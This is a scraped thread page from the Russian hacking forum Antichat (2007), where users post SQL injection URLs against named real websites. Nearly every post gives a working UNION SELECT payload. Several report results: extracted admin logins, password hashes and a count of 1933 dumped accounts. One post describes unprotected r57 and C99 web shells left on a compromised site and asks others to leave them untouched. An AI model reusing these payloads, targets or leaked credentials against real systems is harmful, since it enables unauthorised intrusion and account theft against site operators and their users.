ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2631  
Старый 04.07.2007, 14:22
Аватар для [aywo]
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию

http://www.pervogid.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
 
Ответить с цитированием

  #2632  
Старый 04.07.2007, 16:30
Аватар для blaga
blaga
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
Провел на форуме:
2976185

Репутация: 694


Отправить сообщение для blaga с помощью ICQ
По умолчанию

http://www.muscletalk.ru/food.php?id=105'+union+select+1,2,3,4,5,6/*
наткнулся.
 
Ответить с цитированием

  #2633  
Старый 04.07.2007, 17:38
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Искал админку, нашёл SQL =\
Цитата:
http://www.admin.nyagan.ru/print.php?conid=-358+union+select+1,2,3,4,5,6,7,8,9
 
Ответить с цитированием

  #2634  
Старый 04.07.2007, 18:34
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Boston University

TV
Код:
http://www.butv10.com/series.php?id=-1+union+select+1,convert(concat(version(),0x3a,user(),0x3a,database()),binary),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
www.bu.edu
Код:
http://www.bu.edu/phpbin/news/releases/display.php?id=-1+union+select+convert(concat(version(),0x3a,user(),0x3a,database()),binary),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17/*
 
Ответить с цитированием

  #2635  
Старый 04.07.2007, 18:48
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от NOmeR1  
Искал админку, нашёл SQL =\
Не знаю, что за одминку ты там искал, но уже кто-то шелл r57 залил
Причем язык какой-то турецкий нах, и не запаролен он!
PHP код:
http://www.admin.nyagan.ru/admin.php 
гы, еще и C99 шелл там же валяется, видимо очень модный, известный сайт)))
Афигеть, шелл индонезийский, на наши сайты позарились ИНДОНЕЗИЙСКИЕ КУЛ ХАЦКЕРЫ )))))))))

ЗЫ
тока забыли пароль поставить =\
ЗЗЫ
прошу наших умельцев сайт пока не ломать и шелл не трогать, пусть народ поглумится...

Последний раз редактировалось [53x]Shadow; 04.07.2007 в 19:04..
 
Ответить с цитированием

  #2636  
Старый 04.07.2007, 19:38
Аватар для Extremal
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
По умолчанию

Код:
http://www.fortline.ru/page.php?id=2+union+select+1,password,3,login+from+users+limit+7,10/*
admin:Y2g3Yjhh

Последний раз редактировалось Extremal; 04.07.2007 в 21:44..
 
Ответить с цитированием

  #2637  
Старый 04.07.2007, 23:48
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от Extremal  

тута ВРОДЕ бы не хавтает прав.или тупо нету баз=)
Код:
http://www.korsteklobor.ru/category.php?id=-1+union+select+1,2,3/*
Тута я ни че не могу вывести на поля

вот так выводится

Код:
http://www.korsteklobor.ru/category.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),0x7a),0x7a),3/*
 
Ответить с цитированием

  #2638  
Старый 05.07.2007, 11:19
Аватар для hitex
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

хостинг вроде какой-то бесплатный )
Код:
http://www.ccr.ru/print.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x203a20,username,password,id),31337),31337),6,7,8,9,10,11,12+from+users/*
1933 акка
 
Ответить с цитированием

  #2639  
Старый 05.07.2007, 16:49
Аватар для Extremal
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
По умолчанию

Код:
http://www.ukrmusic.com.ua/rus/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,name,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+users/*
пассы не смог вывести...
-------------------------------
Код:
http://www.riotinmyheart.net/fanlistings/category.php?id=1+union+select+user_login+from+wp_users/*
Код:
http://www.riotinmyheart.net/fanlistings/category.php?id=1+union+select+user_pass+from+wp_users/*
admin:9393db8a978983f3b1bd0818eb4f6b21

Код:
http://www.suplementydiety.pl/index.php?id=-1+union+select+1,username,user_password,4,5,6,7,8,9,10+from+phpbb_users+limit+1,1/*
admin:35d08531d3d78614e281b191f10ac78f
P.S.Подскажить какой формат етих хэшов?md5?

Последний раз редактировалось Extremal; 05.07.2007 в 20:35..
 
Ответить с цитированием

  #2640  
Старый 05.07.2007, 17:43
Аватар для cylaaaan
cylaaaan
Участник форума
Регистрация: 31.08.2006
Сообщений: 149
Провел на форуме:
1763379

Репутация: 155
Отправить сообщение для cylaaaan с помощью ICQ
По умолчанию

Кинотеатр =\

Код:
http://marscity.ru/ansver.php?konkurs=-1+UNION+SELECT+1,2,3,4,5+from+konkurs/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ